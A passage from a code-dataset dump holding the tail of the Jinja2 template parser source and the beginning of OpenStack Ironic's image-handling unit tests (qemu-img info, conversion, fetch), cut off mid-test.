= []\n for exprs in end_token_stack:\n expected.extend(map(describe_token_expr, exprs))\n if end_token_stack:\n currently_looking = ' or '.join(\n \"'%s'\" % describe_token_expr(expr)\n for expr in end_token_stack[-1])\n else:\n currently_looking = None\n\n if name is None:\n message = ['Unexpected end of template.']\n else:\n message = ['Encountered unknown tag \\'%s\\'.' % name]\n\n if currently_looking:\n if name is not None and name in expected:\n message.append('You probably made a nesting mistake. Jinja '\n 'is expecting this tag, but currently looking '\n 'for %s.' % currently_looking)\n else:\n message.append('Jinja was looking for the following tags: '\n '%s.' % currently_looking)\n\n if self._tag_stack:\n message.append('The innermost block that needs to be '\n 'closed is \\'%s\\'.' % self._tag_stack[-1])\n\n self.fail(' '.join(message), lineno)\n\n def fail_unknown_tag(self, name, lineno=None):\n \"\"\"Called if the parser encounters an unknown tag. Tries to fail\n with a human readable error message that could help to identify\n the problem.\n \"\"\"\n return self._fail_ut_eof(name, self._end_token_stack, lineno)\n\n def fail_eof(self, end_tokens=None, lineno=None):\n \"\"\"Like fail_unknown_tag but for end of template situations.\"\"\"\n stack = list(self._end_token_stack)\n if end_tokens is not None:\n stack.append(end_tokens)\n return self._fail_ut_eof(None, stack, lineno)\n\n def is_tuple_end(self, extra_end_rules=None):\n \"\"\"Are we at the end of a tuple?\"\"\"\n if self.stream.current.type in ('variable_end', 'block_end', 'rparen'):\n return True\n elif extra_end_rules is not None:\n return self.stream.current.test_any(extra_end_rules)\n return False\n\n def free_identifier(self, lineno=None):\n \"\"\"Return a new free identifier as :class:`~jinja2.nodes.InternalName`.\"\"\"\n self._last_identifier += 1\n rv = object.__new__(nodes.InternalName)\n nodes.Node.__init__(rv, 'fi%d' % self._last_identifier, lineno=lineno)\n return rv\n\n def parse_statement(self):\n \"\"\"Parse a single statement.\"\"\"\n token = self.stream.current\n if token.type != 'name':\n self.fail('tag name expected', token.lineno)\n self._tag_stack.append(token.value)\n pop_tag = True\n try:\n if token.value in _statement_keywords:\n return getattr(self, 'parse_' + self.stream.current.value)()\n if token.value == 'call':\n return self.parse_call_block()\n if token.value == 'filter':\n return self.parse_filter_block()\n ext = self.extensions.get(token.value)\n if ext is not None:\n return ext(self)\n\n # did not work out, remove the token we pushed by accident\n # from the stack so that the unknown tag fail function can\n # produce a proper error message.\n self._tag_stack.pop()\n pop_tag = False\n self.fail_unknown_tag(token.value, token.lineno)\n finally:\n if pop_tag:\n self._tag_stack.pop()\n\n def parse_statements(self, end_tokens, drop_needle=False):\n \"\"\"Parse multiple statements into a list until one of the end tokens\n is reached. This is used to parse the body of statements as it also\n parses template data if appropriate. The parser checks first if the\n current token is a colon and skips it if there is one. Then it checks\n for the block end and parses until if one of the `end_tokens` is\n reached. Per default the active token in the stream at the end of\n the call is the matched end token. If this is not wanted `drop_needle`\n can be set to `True` and the end token is removed.\n \"\"\"\n # the first token may be a colon for python compatibility\n self.stream.skip_if('colon')\n\n # in the future it would be possible to add whole code sections\n # by adding some sort of end of statement token and parsing those here.\n self.stream.expect('block_end')\n result = self.subparse(end_tokens)\n\n # we reached the end of the template too early, the subparser\n # does not check for this, so we do that now\n if self.stream.current.type == 'eof':\n self.fail_eof(end_tokens)\n\n if drop_needle:\n next(self.stream)\n return result\n\n def parse_set(self):\n \"\"\"Parse an assign statement.\"\"\"\n lineno = next(self.stream).lineno\n target = self.parse_assign_target()\n self.stream.expect('assign')\n expr = self.parse_tuple()\n return nodes.Assign(target, expr, lineno=lineno)\n\n def parse_for(self):\n \"\"\"Parse a for loop.\"\"\"\n lineno = self.stream.expect('name:for').lineno\n target = self.parse_assign_target(extra_end_rules=('name:in',))\n self.stream.expect('name:in')\n iter = self.parse_tuple(with_condexpr=False,\n extra_end_rules=('name:recursive',))\n test = None\n if self.stream.skip_if('name:if'):\n test = self.parse_expression()\n recursive = self.stream.skip_if('name:recursive')\n body = self.parse_statements(('name:endfor', 'name:else'))\n if next(self.stream).value == 'endfor':\n else_ = []\n else:\n else_ = self.parse_statements(('name:endfor',), drop_needle=True)\n return nodes.For(target, iter, body, else_, test,\n recursive, lineno=lineno)\n\n def parse_if(self):\n \"\"\"Parse an if construct.\"\"\"\n node = result = nodes.If(lineno=self.stream.expect('name:if').lineno)\n while 1:\n node.test = self.parse_tuple(with_condexpr=False)\n node.body = self.parse_statements(('name:elif', 'name:else',\n 'name:endif'))\n token = next(self.stream)\n if token.test('name:elif'):\n new_node = nodes.If(lineno=self.stream.current.lineno)\n node.else_ = [new_node]\n node = new_node\n continue\n elif token.test('name:else'):\n node.else_ = self.parse_statements(('name:endif',),\n drop_needle=True)\n else:\n node.else_ = []\n break\n return result\n\n def parse_block(self):\n node = nodes.Block(lineno=next(self.stream).lineno)\n node.name = self.stream.expect('name').value\n node.scoped = self.stream.skip_if('name:scoped')\n\n # common problem people encounter when switching from django\n # to jinja. we do not support hyphens in block names, so let's\n # raise a nicer error message in that case.\n if self.stream.current.type == 'sub':\n self.fail('Block names in Jinja have to be valid Python '\n 'identifiers and may not contain hypens, use an '\n 'underscore instead.')\n\n node.body = self.parse_statements(('name:endblock',), drop_needle=True)\n self.stream.skip_if('name:' + node.name)\n return node\n\n def parse_extends(self):\n node = nodes.Extends(lineno=next(self.stream).lineno)\n node.template = self.parse_expression()\n return node\n\n def parse_import_context(self, node, default):\n if self.stream.current.test_any('name:with', 'name:without') and \\\n self.stream.look().test('name:context'):\n node.with_context = next(self.stream).value == 'with'\n self.stream.skip()\n else:\n node.with_context = default\n return node\n\n def parse_include(self):\n node = nodes.Include(lineno=next(self.stream).lineno)\n node.template = self.parse_expression()\n if self.stream.current.test('name:ignore') and \\\n self.stream.look().test('name:missing'):\n node.ignore_missing = True\n self.stream.skip(2)\n else:\n node.ignore_missing = False\n return self.parse_import_context(node, True)\n\n def parse_import(self):\n node = nodes.Import(lineno=next(self.stream).lineno)\n node.template = self.parse_expression()\n self.stream.expect('name:as')\n node.target = self.parse_assign_target(name_only=True).name\n return self.parse_import_context(node, False)\n\n def parse_from(self):\n node = nodes.FromImport(lineno=next(self.stream).lineno)\n node.template = self.parse_expression()\n self.stream.expect('name:import')\n node.names = []\n\n def parse_context():\n if self.stream.current.value in ('with', 'without') and \\\n self.stream.look().test('name:context'):\n node.with_context = next(self.stream).value == 'with'\n self.stream.skip()\n return True\n return False\n\n while 1:\n if node.names:\n self.stream.expect('comma')\n if self.stream.current.type == 'name':\n if parse_context():\n break\n target = self.parse_assign_target(name_only=True)\n if target.name.startswith('_'):\n self.fail('names starting with an underline can not '\n 'be imported', target.lineno,\n exc=TemplateAssertionError)\n if self.stream.skip_if('name:as'):\n alias = self.parse_assign_target(name_only=True)\n node.names.append((target.name, alias.name))\n else:\n node.names.append(target.name)\n if parse_context() or self.stream.current.type != 'comma':\n break\n else:\n break\n if not hasattr(node, 'with_context'):\n node.with_context = False\n self.stream.skip_if('comma')\n return node\n\n def parse_signature(self, node):\n node.args = args = []\n node.defaults = defaults = []\n self.stream.expect('lparen')\n while self.stream.current.type != 'rparen':\n if args:\n self.stream.expect('comma')\n arg = self.parse_assign_target(name_only=True)\n arg.set_ctx('param')\n if self.stream.skip_if('assign'):\n defaults.append(self.parse_expression())\n args.append(arg)\n self.stream.expect('rparen')\n\n def parse_call_block(self):\n node = nodes.CallBlock(lineno=next(self.stream).lineno)\n if self.stream.current.type == 'lparen':\n self.parse_signature(node)\n else:\n node.args = []\n node.defaults = []\n\n node.call = self.parse_expression()\n if not isinstance(node.call, nodes.Call):\n self.fail('expected call', node.lineno)\n node.body = self.parse_statements(('name:endcall',), drop_needle=True)\n return node\n\n def parse_filter_block(self):\n node = nodes.FilterBlock(lineno=next(self.stream).lineno)\n node.filter = self.parse_filter(None, start_inline=True)\n node.body = self.parse_statements(('name:endfilter',),\n drop_needle=True)\n return node\n\n def parse_macro(self):\n node = nodes.Macro(lineno=next(self.stream).lineno)\n node.name = self.parse_assign_target(name_only=True).name\n self.parse_signature(node)\n node.body = self.parse_statements(('name:endmacro',),\n drop_needle=True)\n return node\n\n def parse_print(self):\n node = nodes.Output(lineno=next(self.stream).lineno)\n node.nodes = []\n while self.stream.current.type != 'block_end':\n if node.nodes:\n self.stream.expect('comma')\n node.nodes.append(self.parse_expression())\n return node\n\n def parse_assign_target(self, with_tuple=True, name_only=False,\n extra_end_rules=None):\n \"\"\"Parse an assignment target. As Jinja2 allows assignments to\n tuples, this function can parse all allowed assignment targets. Per\n default assignments to tuples are parsed, that can be disable however\n by setting `with_tuple` to `False`. If only assignments to names are\n wanted `name_only` can be set to `True`. The `extra_end_rules`\n parameter is forwarded to the tuple parsing function.\n \"\"\"\n if name_only:\n token = self.stream.expect('name')\n target = nodes.Name(token.value, 'store', lineno=token.lineno)\n else:\n if with_tuple:\n target = self.parse_tuple(simplified=True,\n extra_end_rules=extra_end_rules)\n else:\n target = self.parse_primary(with_postfix=False)\n target.set_ctx('store')\n if not target.can_assign():\n self.fail('can\\'t assign to %r' % target.__class__.\n __name__.lower(), target.lineno)\n return target\n\n def parse_expression(self, with_condexpr=True):\n \"\"\"Parse an expression. Per default all expressions are parsed, if\n the optional `with_condexpr` parameter is set to `False` conditional\n expressions are not parsed.\n \"\"\"\n if with_condexpr:\n return self.parse_condexpr()\n return self.parse_or()\n\n def parse_condexpr(self):\n lineno = self.stream.current.lineno\n expr1 = self.parse_or()\n while self.stream.skip_if('name:if'):\n expr2 = self.parse_or()\n if self.stream.skip_if('name:else'):\n expr3 = self.parse_condexpr()\n else:\n expr3 = None\n expr1 = nodes.CondExpr(expr2, expr1, expr3, lineno=lineno)\n lineno = self.stream.current.lineno\n return expr1\n\n def parse_or(self):\n lineno = self.stream.current.lineno\n left = self.parse_and()\n while self.stream.skip_if('name:or'):\n right = self.parse_and()\n left = nodes.Or(left, right, lineno=lineno)\n lineno = self.stream.current.lineno\n return left\n\n def parse_and(self):\n lineno = self.stream.current.lineno\n left = self.parse_not()\n while self.stream.skip_if('name:and'):\n right = self.parse_not()\n left = nodes.And(left, right, lineno=lineno)\n lineno = self.stream.current.lineno\n return left\n\n def parse_not(self):\n if self.stream.current.test('name:not'):\n lineno = next(self.stream).lineno\n return nodes.Not(self.parse_not(), lineno=lineno)\n return self.parse_compare()\n\n def parse_compare(self):\n lineno = self.stream.current.lineno\n expr = self.parse_add()\n ops = []\n while 1:\n token_type = self.stream.current.type\n if token_type in _compare_operators:\n next(self.stream)\n ops.append(nodes.Operand(token_type, self.parse_add()))\n elif self.stream.skip_if('name:in'):\n ops.append(nodes.Operand('in', self.parse_add()))\n elif self.stream.current.test('name:not') and \\\n self.stream.look().test('name:in'):\n self.stream.skip(2)\n ops.append(nodes.Operand('notin', self.parse_add()))\n else:\n break\n lineno = self.stream.current.lineno\n if not ops:\n return expr\n return nodes.Compare(expr, ops, lineno=lineno)\n\n def parse_add(self):\n lineno = self.stream.current.lineno\n left = self.parse_sub()\n while self.stream.current.type == 'add':\n next(self.stream)\n right = self.parse_sub()\n left = nodes.Add(left, right, lineno=lineno)\n lineno = self.stream.current.lineno\n return left\n\n def parse_sub(self):\n lineno = self.stream.current.lineno\n left = self.parse_concat()\n while self.stream.current.type == 'sub':\n next(self.stream)\n right = self.parse_concat()\n left = nodes.Sub(left, right, lineno=lineno)\n lineno = self.stream.current.lineno\n return left\n\n def parse_concat(self):\n lineno = self.stream.current.lineno\n args = [self.parse_mul()]\n while self.stream.current.type == 'tilde':\n next(self.stream)\n args.append(self.parse_mul())\n if len(args) == 1:\n return args[0]\n return nodes.Concat(args, lineno=lineno)\n\n def parse_mul(self):\n lineno = self.stream.current.lineno\n left = self.parse_div()\n while self.stream.current.type == 'mul':\n next(self.stream)\n right = self.parse_div()\n left = nodes.Mul(left, right, lineno=lineno)\n lineno = self.stream.current.lineno\n return left\n\n def parse_div(self):\n lineno = self.stream.current.lineno\n left = self.parse_floordiv()\n while self.stream.current.type == 'div':\n next(self.stream)\n right = self.parse_floordiv()\n left = nodes.Div(left, right, lineno=lineno)\n lineno = self.stream.current.lineno\n return left\n\n def parse_floordiv(self):\n lineno = self.stream.current.lineno\n left = self.parse_mod()\n while self.stream.current.type == 'floordiv':\n next(self.stream)\n right = self.parse_mod()\n left = nodes.FloorDiv(left, right, lineno=lineno)\n lineno = self.stream.current.lineno\n return left\n\n def parse_mod(self):\n lineno = self.stream.current.lineno\n left = self.parse_pow()\n while self.stream.current.type == 'mod':\n next(self.stream)\n right = self.parse_pow()\n left = nodes.Mod(left, right, lineno=lineno)\n lineno = self.stream.current.lineno\n return left\n\n def parse_pow(self):\n lineno = self.stream.current.lineno\n left = self.parse_unary()\n while self.stream.current.type == 'pow':\n next(self.stream)\n right = self.parse_unary()\n left = nodes.Pow(left, right, lineno=lineno)\n lineno = self.stream.current.lineno\n return left\n\n def parse_unary(self):\n token_type = self.stream.current.type\n lineno = self.stream.current.lineno\n if token_type == 'sub':\n next(self.stream)\n node = self.parse_unary()\n return nodes.Neg(node, lineno=lineno)\n if token_type == 'add':\n next(self.stream)\n node = self.parse_unary()\n return nodes.Pos(node, lineno=lineno)\n return self.parse_primary()\n\n def parse_primary(self, with_postfix=True):\n token = self.stream.current\n if token.type == 'name':\n if token.value in ('true', 'false', 'True', 'False'):\n node = nodes.Const(token.value in ('true', 'True'),\n lineno=token.lineno)\n elif token.value in ('none', 'None'):\n node = nodes.Const(None, lineno=token.lineno)\n else:\n node = nodes.Name(token.value, 'load', lineno=token.lineno)\n next(self.stream)\n elif token.type == 'string':\n next(self.stream)\n buf = [token.value]\n lineno = token.lineno\n while self.stream.current.type == 'string':\n buf.append(self.stream.current.value)\n next(self.stream)\n node = nodes.Const(''.join(buf), lineno=lineno)\n elif token.type in ('integer', 'float'):\n next(self.stream)\n node = nodes.Const(token.value, lineno=token.lineno)\n elif token.type == 'lparen':\n next(self.stream)\n node = self.parse_tuple(explicit_parentheses=True)\n self.stream.expect('rparen')\n elif token.type == 'lbracket':\n node = self.parse_list()\n elif token.type == 'lbrace':\n node = self.parse_dict()\n else:\n self.fail(\"unexpected '%s'\" % describe_token(token), token.lineno)\n if with_postfix:\n node = self.parse_postfix(node)\n return node\n\n def parse_tuple(self, simplified=False, with_condexpr=True,\n extra_end_rules=None, explicit_parentheses=False):\n \"\"\"Works like `parse_expression` but if multiple expressions are\n delimited by a comma a :class:`~jinja2.nodes.Tuple` node is created.\n This method could also return a regular expression instead of a tuple\n if no commas where found.\n\n The default parsing mode is a full tuple. If `simplified` is `True`\n only names and literals are parsed. The `no_condexpr` parameter is\n forwarded to :meth:`parse_expression`.\n\n Because tuples do not require delimiters and may end in a bogus comma\n an extra hint is needed that marks the end of a tuple. For example\n for loops support tuples between `for` and `in`. In that case the\n `extra_end_rules` is set to ``['name:in']``.\n\n `explicit_parentheses` is true if the parsing was triggered by an\n expression in parentheses. This is used to figure out if an empty\n tuple is a valid expression or not.\n \"\"\"\n lineno = self.stream.current.lineno\n if simplified:\n parse = lambda: self.parse_primary(with_postfix=False)\n elif with_condexpr:\n parse = self.parse_expression\n else:\n parse = lambda: self.parse_expression(with_condexpr=False)\n args = []\n is_tuple = False\n while 1:\n if args:\n self.stream.expect('comma')\n if self.is_tuple_end(extra_end_rules):\n break\n args.append(parse())\n if self.stream.current.type == 'comma':\n is_tuple = True\n else:\n break\n lineno = self.stream.current.lineno\n\n if not is_tuple:\n if args:\n return args[0]\n\n # if we don't have explicit parentheses, an empty tuple is\n # not a valid expression. This would mean nothing (literally\n # nothing) in the spot of an expression would be an empty\n # tuple.\n if not explicit_parentheses:\n self.fail('Expected an expression, got \\'%s\\'' %\n describe_token(self.stream.current))\n\n return nodes.Tuple(args, 'load', lineno=lineno)\n\n def parse_list(self):\n token = self.stream.expect('lbracket')\n items = []\n while self.stream.current.type != 'rbracket':\n if items:\n self.stream.expect('comma')\n if self.stream.current.type == 'rbracket':\n break\n items.append(self.parse_expression())\n self.stream.expect('rbracket')\n return nodes.List(items, lineno=token.lineno)\n\n def parse_dict(self):\n token = self.stream.expect('lbrace')\n items = []\n while self.stream.current.type != 'rbrace':\n if items:\n self.stream.expect('comma')\n if self.stream.current.type == 'rbrace':\n break\n key = self.parse_expression()\n self.stream.expect('colon')\n value = self.parse_expression()\n items.append(nodes.Pair(key, value, lineno=key.lineno))\n self.stream.expect('rbrace')\n return nodes.Dict(items, lineno=token.lineno)\n\n def parse_postfix(self, node):\n while 1:\n token_type = self.stream.current.type\n if token_type == 'dot' or token_type == 'lbracket':\n node = self.parse_subscript(node)\n elif token_type == 'lparen':\n node = self.parse_call(node)\n elif token_type == 'pipe':\n node = self.parse_filter(node)\n elif token_type == 'name' and self.stream.current.value == 'is':\n node = self.parse_test(node)\n else:\n break\n return node\n\n def parse_subscript(self, node):\n token = next(self.stream)\n if token.type == 'dot':\n attr_token = self.stream.current\n next(self.stream)\n if attr_token.type == 'name':\n return nodes.Getattr(node, attr_token.value, 'load',\n lineno=token.lineno)\n elif attr_token.type != 'integer':\n self.fail('expected name or number', attr_token.lineno)\n arg = nodes.Const(attr_token.value, lineno=attr_token.lineno)\n return nodes.Getitem(node, arg, 'load', lineno=token.lineno)\n if token.type == 'lbracket':\n priority_on_attribute = False\n args = []\n while self.stream.current.type != 'rbracket':\n if args:\n self.stream.expect('comma')\n args.append(self.parse_subscribed())\n self.stream.expect('rbracket')\n if len(args) == 1:\n arg = args[0]\n else:\n arg = nodes.Tuple(args, 'load', lineno=token.lineno)\n return nodes.Getitem(node, arg, 'load', lineno=token.lineno)\n self.fail('expected subscript expression', self.lineno)\n\n def parse_subscribed(self):\n lineno = self.stream.current.lineno\n\n if self.stream.current.type == 'colon':\n next(self.stream)\n args = [None]\n else:\n node = self.parse_expression()\n if self.stream.current.type != 'colon':\n return node\n next(self.stream)\n args = [node]\n\n if self.stream.current.type == 'colon':\n args.append(None)\n elif self.stream.current.type not in ('rbracket', 'comma'):\n args.append(self.parse_expression())\n else:\n args.append(None)\n\n if self.stream.current.type == 'colon':\n next(self.stream)\n if self.stream.current.type not in ('rbracket', 'comma'):\n args.append(self.parse_expression())\n else:\n args.append(None)\n else:\n args.append(None)\n\n return nodes.Slice(lineno=lineno, *args)\n\n def parse_call(self, node):\n token = self.stream.expect('lparen')\n args = []\n kwargs = []\n dyn_args = dyn_kwargs = None\n require_comma = False\n\n def ensure(expr):\n if not expr:\n self.fail('invalid syntax for function call expression',\n token.lineno)\n\n while self.stream.current.type != 'rparen':\n if require_comma:\n self.stream.expect('comma')\n # support for trailing comma\n if self.stream.current.type == 'rparen':\n break\n if self.stream.current.type == 'mul':\n ensure(dyn_args is None and dyn_kwargs is None)\n next(self.stream)\n dyn_args = self.parse_expression()\n elif self.stream.current.type == 'pow':\n ensure(dyn_kwargs is None)\n next(self.stream)\n dyn_kwargs = self.parse_expression()\n else:\n ensure(dyn_args is None and dyn_kwargs is None)\n if self.stream.current.type == 'name' and \\\n self.stream.look().type == 'assign':\n key = self.stream.current.value\n self.stream.skip(2)\n value = self.parse_expression()\n kwargs.append(nodes.Keyword(key, value,\n lineno=value.lineno))\n else:\n ensure(not kwargs)\n args.append(self.parse_expression())\n\n require_comma = True\n self.stream.expect('rparen')\n\n if node is None:\n return args, kwargs, dyn_args, dyn_kwargs\n return nodes.Call(node, args, kwargs, dyn_args, dyn_kwargs,\n lineno=token.lineno)\n\n def parse_filter(self, node, start_inline=False):\n while self.stream.current.type == 'pipe' or start_inline:\n if not start_inline:\n next(self.stream)\n token = self.stream.expect('name')\n name = token.value\n while self.stream.current.type == 'dot':\n next(self.stream)\n name += '.' + self.stream.expect('name').value\n if self.stream.current.type == 'lparen':\n args, kwargs, dyn_args, dyn_kwargs = self.parse_call(None)\n else:\n args = []\n kwargs = []\n dyn_args = dyn_kwargs = None\n node = nodes.Filter(node, name, args, kwargs, dyn_args,\n dyn_kwargs, lineno=token.lineno)\n start_inline = False\n return node\n\n def parse_test(self, node):\n token = next(self.stream)\n if self.stream.current.test('name:not'):\n next(self.stream)\n negated = True\n else:\n negated = False\n name = self.stream.expect('name').value\n while self.stream.current.type == 'dot':\n next(self.stream)\n name += '.' + self.stream.expect('name').value\n dyn_args = dyn_kwargs = None\n kwargs = []\n if self.stream.current.type == 'lparen':\n args, kwargs, dyn_args, dyn_kwargs = self.parse_call(None)\n elif self.stream.current.type in ('name', 'string', 'integer',\n 'float', 'lparen', 'lbracket',\n 'lbrace') and not \\\n self.stream.current.test_any('name:else', 'name:or',\n 'name:and'):\n if self.stream.current.test('name:is'):\n self.fail('You cannot chain multiple tests with is')\n args = [self.parse_expression()]\n else:\n args = []\n node = nodes.Test(node, name, args, kwargs, dyn_args,\n dyn_kwargs, lineno=token.lineno)\n if negated:\n node = nodes.Not(node, lineno=token.lineno)\n return node\n\n def subparse(self, end_tokens=None):\n body = []\n data_buffer = []\n add_data = data_buffer.append\n\n if end_tokens is not None:\n self._end_token_stack.append(end_tokens)\n\n def flush_data():\n if data_buffer:\n lineno = data_buffer[0].lineno\n body.append(nodes.Output(data_buffer[:], lineno=lineno))\n del data_buffer[:]\n\n try:\n while self.stream:\n token = self.stream.current\n if token.type == 'data':\n if token.value:\n add_data(nodes.TemplateData(token.value,\n lineno=token.lineno))\n next(self.stream)\n elif token.type == 'variable_begin':\n next(self.stream)\n add_data(self.parse_tuple(with_condexpr=True))\n self.stream.expect('variable_end')\n elif token.type == 'block_begin':\n flush_data()\n next(self.stream)\n if end_tokens is not None and \\\n self.stream.current.test_any(*end_tokens):\n return body\n rv = self.parse_statement()\n if isinstance(rv, list):\n body.extend(rv)\n else:\n body.append(rv)\n self.stream.expect('block_end')\n else:\n raise AssertionError('internal parsing error')\n\n flush_data()\n finally:\n if end_tokens is not None:\n self._end_token_stack.pop()\n\n return body\n\n def parse(self):\n \"\"\"Parse the whole template into a `Template` node.\"\"\"\n result = nodes.Template(self.subparse(), lineno=1)\n result.set_environment(self.environment)\n return result\n"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2434,"cells":{"repo_name":{"kind":"string","value":"Tehsmash/ironic"},"path":{"kind":"string","value":"ironic/tests/test_images.py"},"copies":{"kind":"string","value":"1"},"size":{"kind":"string","value":"20411"},"content":{"kind":"string","value":"# Vim: tabstop=4 shiftwidth=4 softtabstop=4\n# coding=utf-8\n\n# Copyright 2013 Hewlett-Packard Development Company, L.P.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport os\nimport shutil\n\nimport mock\nfrom oslo.concurrency import processutils\nfrom oslo.config import cfg\nimport six.moves.builtins as __builtin__\n\nfrom ironic.common import exception\nfrom ironic.common import image_service\nfrom ironic.common import images\nfrom ironic.common import utils\nfrom ironic.openstack.common import imageutils\nfrom ironic.tests import base\n\nCONF = cfg.CONF\n\n\nclass IronicImagesTestCase(base.TestCase):\n\n class FakeImgInfo(object):\n pass\n\n @mock.patch.object(imageutils, 'QemuImgInfo')\n @mock.patch.object(os.path, 'exists', return_value=False)\n def test_qemu_img_info_path_doesnt_exist(self, path_exists_mock,\n qemu_img_info_mock):\n images.qemu_img_info('noimg')\n path_exists_mock.assert_called_once_with('noimg')\n qemu_img_info_mock.assert_called_once_with()\n\n @mock.patch.object(utils, 'execute', return_value=('out', 'err'))\n @mock.patch.object(imageutils, 'QemuImgInfo')\n @mock.patch.object(os.path, 'exists', return_value=True)\n def test_qemu_img_info_path_exists(self, path_exists_mock,\n qemu_img_info_mock, execute_mock):\n images.qemu_img_info('img')\n path_exists_mock.assert_called_once_with('img')\n execute_mock.assert_called_once_with('env', 'LC_ALL=C', 'LANG=C',\n 'qemu-img', 'info', 'img')\n qemu_img_info_mock.assert_called_once_with('out')\n\n @mock.patch.object(utils, 'execute')\n def test_convert_image(self, execute_mock):\n images.convert_image('source', 'dest', 'out_format')\n execute_mock.assert_called_once_with('qemu-img', 'convert', '-O',\n 'out_format', 'source', 'dest',\n run_as_root=False)\n\n @mock.patch.object(image_service, 'Service')\n @mock.patch.object(__builtin__, 'open')\n def test_fetch_no_image_service(self, open_mock, image_service_mock):\n mock_file_handle = mock.MagicMock(spec=file)\n mock_file_handle.__enter__.return_value = 'file'\n open_mock.return_value = mock_file_handle\n\n images.fetch('context', 'image_href', 'path')\n\n open_mock.assert_called_once_with('path', 'wb')\n image_service_mock.assert_called_once_with(version=1,\n context='context')\n image_service_mock.return_value.download.assert_called_once_with(\n 'image_href', 'file')\n\n @mock.patch.object(__builtin__, 'open')\n def test_fetch_image_service(self, open_mock):\n mock_file_handle = mock.MagicMock(spec=file)\n mock_file_handle.__enter__.return_value = 'file'\n open_mock.return_value = mock_file_handle\n image_service_mock = mock.Mock()\n\n images.fetch('context', 'image_href', 'path', image_service_mock)\n\n open_mock.assert_called_once_with('path', 'wb')\n image_service_mock.download.assert_called_once_with(\n 'image_href', 'file')\n\n @mock.patch.object(images, 'image_to_raw')\n @mock.patch.object(__builtin__, 'open')\n def test_fetch_image_service_force_raw(self, open_mock, image_to_raw_mock):\n mock_file_handle = mock.MagicMock(spec=file)\n mock_file_handle.__enter__.return_value = 'file'\n open_mock.return_value = mock_file_handle\n image_service_mock = mock.Mock()\n\n images.fetch('context', 'image_href', 'path', image_service_mock,\n force_raw=True)\n\n open_mock.assert_called_once_with('path', 'wb')\n image_service_mock.download.assert_called_once_with(\n 'image_href', 'file')\n image_to_raw_mock.assert_called_once_with(\n 'image_href', 'path', 'path.part')\n\n @mock.patch.object(images, 'qemu_img_info')\n def test_image_to_raw_no_file_format(self, qemu_img_info_mock):\n info = self.FakeImgInfo()\n info.file_format = None\n qemu_img_info_mock.return_value = info\n\n e = self.assertRaises(exception.ImageUnacceptable, images.image_to_raw,\n 'image_href', 'path', 'path_tmp')\n qemu_img_info_mock.assert_called_once_with('path_tmp')\n self.assertIn(\"'qemu-img info' parsing failed.\", str(e))\n\n @mock.patch.object(images, 'qemu_img_info')\n def test_image_to_raw_backing_file_present(self, qemu_img_info_mock):\n info = self.FakeImgInfo()\n info.file_format = 'raw'\n info.backing_file = 'backing_file'\n qemu_img_info_mock.return_value = info\n\n e = self.assertRaises(exception.ImageUnacceptable, images.image_to_raw,\n 'image_href', 'path', 'path_tmp')\n qemu_img_info_mock.assert_called_once_with('path_tmp')\n self.assertIn(\"fmt=raw backed by: backing_file\", str(e))\n\n @mock.patch.object(os, 'rename')\n @mock.patch.object(os, 'unlink')\n @mock.patch.object(images, 'convert_image')\n @mock.patch.object(images, 'qemu_img_info')\n def test_image_to_raw(self, qemu_img_info_mock, convert_image_mock,\n unlink_mock, rename_mock):\n CONF.set_override('force_raw_images', True)\n info = self.FakeImgInfo()\n info.file_format = 'fmt'\n info.backing_file = None\n qemu_img_info_mock.return_value = info\n\n def convert_side_effect(source, dest, out_format):\n info.file_format = 'raw'\n convert_image_mock.side_effect = convert_side_effect\n\n images.image_to_raw('image_href', 'path', 'path_tmp')\n\n qemu_img_info_mock.assert_has_calls([mock.call('path_tmp'),\n mock.call('path.converted')])\n convert_image_mock.assert_called_once_with('path_tmp',\n 'path.converted', 'raw')\n unlink_mock.assert_called_once_with('path_tmp')\n rename_mock.assert_called_once_with('path.converted', 'path')\n\n @mock.patch.object(os, 'unlink')\n @mock.patch.object(images, 'convert_image')\n @mock.patch.object(images, 'qemu_img_info')\n def test_image_to_raw_not_raw_after_conversion(self, qemu_img_info_mock,\n convert_image_mock,\n unlink_mock):\n CONF.set_override('force_raw_images', True)\n info = self.FakeImgInfo()\n info.file_format = 'fmt'\n info.backing_file = None\n qemu_img_info_mock.return_value = info\n\n self.assertRaises(exception.ImageConvertFailed, images.image_to_raw,\n 'image_href', 'path', 'path_tmp')\n qemu_img_info_mock.assert_has_calls([mock.call('path_tmp'),\n mock.call('path.converted')])\n convert_image_mock.assert_called_once_with('path_tmp',\n 'path.converted', 'raw')\n unlink_mock.assert_called_once_with('path_tmp')\n\n @mock.patch.object(os, 'rename')\n @mock.patch.object(images, 'qemu_img_info')\n def test_image_to_raw_already_raw_format(self, qemu_img_info_mock,\n rename_mock):\n info = self.FakeImgInfo()\n info.file_format = 'raw'\n info.backing_file = None\n qemu_img_info_mock.return_value = info\n\n images.image_to_raw('image_href', 'path', 'path_tmp')\n\n qemu_img_info_mock.assert_called_once_with('path_tmp')\n rename_mock.assert_called_once_with('path_tmp', 'path')\n\n @mock.patch.object(image_service, 'Service')\n def test_download_size_no_image_service(self, image_service_mock):\n images.download_size('context', 'image_href')\n image_service_mock.assert_called_once_with(version=1,\n context='context')\n image_service_mock.return_value.show.assert_called_once_with(\n 'image_href')\n\n def test_download_size_image_service(self):\n image_service_mock = mock.MagicMock()\n images.download_size('context', 'image_href', image_service_mock)\n image_service_mock.show.assert_called_once_with('image_href')\n\n @mock.patch.object(images, 'qemu_img_info')\n def test_converted_size(self, qemu_img_info_mock):\n info = self.FakeImgInfo()\n info.virtual_size = 1\n qemu_img_info_mock.return_value = info\n size = images.converted_size('path')\n qemu_img_info_mock.assert_called_once_with('path')\n self.assertEqual(1, size)\n\n\nclass FsImageTestCase(base.TestCase):\n\n @mock.patch.object(shutil, 'copyfile')\n @mock.patch.object(os, 'makedirs')\n @mock.patch.object(os.path, 'dirname')\n @mock.patch.object(os.path, 'exists')\n def test__create_root_fs(self, path_exists_mock,\n dirname_mock, mkdir_mock, cp_mock):\n\n path_exists_mock_func = lambda path: path == 'root_dir'\n\n files_info = {\n 'a1': 'b1',\n 'a2': 'b2',\n 'a3': 